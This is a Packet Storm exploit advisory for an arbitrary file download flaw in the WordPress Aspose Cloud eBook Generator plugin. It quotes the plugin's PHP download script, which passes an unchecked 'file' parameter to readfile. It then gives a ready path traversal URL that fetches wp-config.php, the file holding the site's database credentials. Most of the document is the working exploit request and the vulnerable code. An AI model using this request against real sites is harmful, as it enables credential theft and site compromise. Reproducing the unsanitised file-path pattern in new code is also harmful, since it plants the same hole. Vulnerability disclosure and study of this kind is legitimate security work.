WordPress Aspose Cloud eBook Generator plugin suffers from an arbitrary file download vulnerability.
946d92ef5d98fe6088b0968e8e32269f8e88de346638aa86691a69187392f267|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title:Wordpress Aspose-Cloud-eBook-Generator Plugin
Arbitrary File Download Vulnerability |
| [+] Exploit Author: Ashiyane Digital Security Team |
| [+] Vendor Homepage :
https://wordpress.org/plugins/aspose-cloud-ebook-generator/
| [+] Download Link :
https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip
| [+] Tested on: Windows,Linux |
| [+] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
| [+] Exploit: |
| [+] Vulnerable file :
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php
|
| [+] Vulnerable Code :
<?php
$file = $_GET['file'];
$file_arr = explode('/',$file);
$file_name = $file_arr[count($file_arr) - 1];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>
| [+]
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File
Address]
| [+]
| [+] Examples :
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed